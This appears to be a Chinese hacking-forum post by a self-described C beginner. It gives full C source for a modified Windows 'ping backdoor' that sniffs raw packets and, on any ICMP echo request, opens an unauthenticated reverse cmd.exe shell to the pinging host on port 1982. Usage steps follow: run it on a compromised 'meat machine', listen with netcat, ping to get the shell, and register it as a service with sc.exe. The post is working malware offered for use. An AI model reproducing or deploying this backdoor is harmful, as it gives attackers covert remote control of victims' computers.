学C修改的ping后门,改为反向连接,免解包
学了一个多星期C,便想尝试修改一下人家的东西。一直感觉自己在混日子,整天
在打游戏,哎。感谢love1983,是他启发我学C。
其实这个修改的ping后门,存在很多问题的,毕竟我刚学C。
主要修改:1,去掉包大小的检测,去掉解包函数,只要sinffer到是icmp包,就直
接反向连接。2,把原来的bind shell(创建两个管道进行通信)改为反向连接(bind2shell)
3,无密码验证,不过可以修改。
使用方法:1,在肉机运行lping.exe。2,本机用nc -l -p 1982。3,ping肉机就可以
直接得到shell了。(lping.exe没有注册成服务,可以用sc.exe来注册)
代码:
/* ======================================================================
Ping BackDoor V0.1 For Win2K
Code by Lion. Welcome to <a href="Http://www.cnhonker.net" target="_blank">Http://www.cnhonker.net</a>
Echo by lintao520
Save as *.cpp
========================================================================= */
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <mstcpip.h>
#pragma comment(lib,"ws2_32")
#define ICMP_ECHO 8 // ICMP回显请求报文的类型值为8
#define ICMP_ECHOREPLY 0 // ICMP回显应答报文的类型值为0
#define BIND_PORT 1982 // 默认bind shell 端口
#define MAX_PACKET 10000 // 最大ICMP包的大小
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,(s))
// 定义IP 首部
typedef struct iphdr
{
unsigned char h_verlen; // 4位首部长度,4位IP版本号 1
unsigned char tos; // 8位服务类型TOS 1
unsigned short total_len; // 16位总长度(字节) 2
unsigned short ident; // 16位标?nbsp; 2
unsigned short frag_and_flags; // 3位标志位 2
unsigned char ttl; // 8位生存时间 TTL 1
unsigned char proto; // 8位协议(TCP, UDP 或其他) 1
unsigned short checksum; // 16位IP首部校验和 2
unsigned int sourceIP; // 32位源IP地址 4
unsigned int destIP; // 32位目的IP地址 4
} IPHeader; // IP首部长度为: 20
// 定义ICMP首部
typedef struct _ihdr
{
unsigned char i_type; // 8位类型 1
unsigned char i_code; // 8位代码 1
unsigned short i_cksum; // 16位校验和 2
unsigned short i_id; // 识别号(一般用进程号作为识别号) 2
unsigned short i_seq; // 报文序列号 2
} ICMPHeader; // ICMP首部长度为: 8
int sniffer(); //sniffer并判断是否ICMP包
void bind2shell(struct sockaddr_in *); // bind shell
DWORD dwBufferLen[10];
DWORD dwBufferInLen = 1;
DWORD dwBytesReturned = 0;
// ICMPDoor 主函数
int main(int argc, char *argv[])
{
WSADATA wsaData;
int retval;
// socket 初始化
if ((retval = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
{
printf("WSAStartup failed: %d/n",retval);
exit(-1);
}
// sniffer 开始
sniffer();
// socket 结束
WSACleanup();
return 0;
}
// sniffer 主函数
int sniffer()
{
SOCKET socksniffer;
struct sockaddr_in dest,from;
struct hostent * hp;
int sread;
int fromlen = sizeof(from);
unsigned char LocalName[256];
char *recvbuf;
ICMPHeader *icmphdr;
// 创建一个原始socket, 接受所有接收的包(sniffer)
if ((socksniffer = WSASocket(AF_INET, SOCK_RAW, IPPROTO_IP, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
{
printf("WSASocket() failed: %d/n", WSAGetLastError());
return -1;
}
// 取得本地地址
gethostname((char*)LocalName, sizeof(LocalName)-1);
if((hp = gethostbyname((char*)LocalName)) == NULL)
{
return -1;
}
memset(&dest,0,sizeof(dest));
memcpy(&dest.sin_addr.s_addr, hp->h_addr_list[0], hp->h_length); // TCP嗅探选项
dest.sin_family = AF_INET;
dest.sin_port = htons(8000); // 指定为8000端口
// socket bind
bind(socksniffer, (PSOCKADDR)&dest, sizeof(dest));
// 设置socket为接受所有包
WSAIoctl(socksniffer, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen), &dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL );
// 分配socket接收缓冲区大小为MAX_PACKET
recvbuf = (char *)xmalloc(MAX_PACKET);
// 循环监听包是否为icmp包
while(1)
{
// 读数据
sread = recvfrom(socksniffer, recvbuf, MAX_PACKET, 0, (struct sockaddr*)&from, &fromlen);
// 如果读数据出错
if (sread == SOCKET_ERROR || sread < 0)
{
if (WSAGetLastError() == WSAETIMEDOUT)
{
continue;
}
printf("recvfrom failed: %d/n",WSAGetLastError());
return -1;
}
else
// 这里判断是否是ICMP类型,是的话就直接bind2shell();
{
icmphdr = (ICMPHeader *)(recvbuf + sizeof(IPHeader)); // ICMP首部的地址等于buf+IP首部长度:buf+20
if (icmphdr->i_type == ICMP_ECHO) //判断是否是icmp包
bind2shell(&from); //绑定ping来源主机ip,把它传给bind2shell()
else
printf("/r/n Get Other Packets!");
}
}
return 1;
}
// bind2shell函数
void bind2shell(struct sockaddr_in * from)
{
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in sa;
memset(&sa,0,sizeof(sa));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket=WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
sa.sin_family=AF_INET;
sa.sin_port=htons(BIND_PORT);
sa.sin_addr.s_addr=from->sin_addr.s_addr;
connect(hSocket,(struct sockaddr*)&sa,sizeof(sa));
si.cb=sizeof(si);
si.dwFlags=STARTF_USESTDHANDLES;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)hSocket;
CreateProcess(NULL,"cmd.exe",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
}
